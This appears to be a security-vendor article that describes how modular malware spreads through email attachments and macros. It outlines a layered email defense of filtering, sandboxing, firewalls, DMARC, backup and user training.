Cybercriminals use email to deliver modular malicious software, also known as modular malware. An ever-increasing trend, modular malware provides an architecture that is more robust, evasive and dangerous than typical document-based or web-based malware. Modular malware includes—and can selectively launch—different payloads and functionality, depending on the target and the goal of the attack. Most malware is distributed as a document attachment that is sent via spam to widely-circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web. Once an infected document is opened, either the malware is automatically installed, or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks. With the rise of botnets executing commands provided by cybercriminals and malware written for wide-spread distribution, modularity has become the new norm. Malware authors are increasingly organized and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely-distributed malware file, modular malware has evolved to become more feature-rich and flexible.
The rapidly evolving threat environment requires a multi-layered protection strategy—one that closes the technical and human gaps—for every organization to maximize its email security performance and minimize the risk of falling victim to sophisticated attacks like modular malware.
Advanced inbound and outbound security techniques should be deployed, including malware detection, spam filters, firewalls, and sandboxing. For emails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious. While many malicious emails appear convincing, spam filters and related security software can pick up subtle clues and help block potentially-threatening messages and attachments from reaching email inboxes. If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through. In addition, encryption and DPL help secure against accidental and malicious data loss. Plus, email archiving is critical for compliance and business-continuity purposes.
Backup helps recover from data deletion, and continuity ensures that critical emails can get sent during a potential outage.
Stop attacks that can bypass the email gateway. Artificial intelligence should be used for spear-phishing protection, and DMARC validation detects and prevents email and domain spoofing.
This top layer of email defense for every business is the most critical. Make phishing simulation and training part of security-awareness training. Ensure end users are aware of new types of attacks, show them how to identify potential threats and transform them from a security liability into a line of defense by testing the effectiveness of in-the-moment training and evaluating the users most vulnerable to attacks.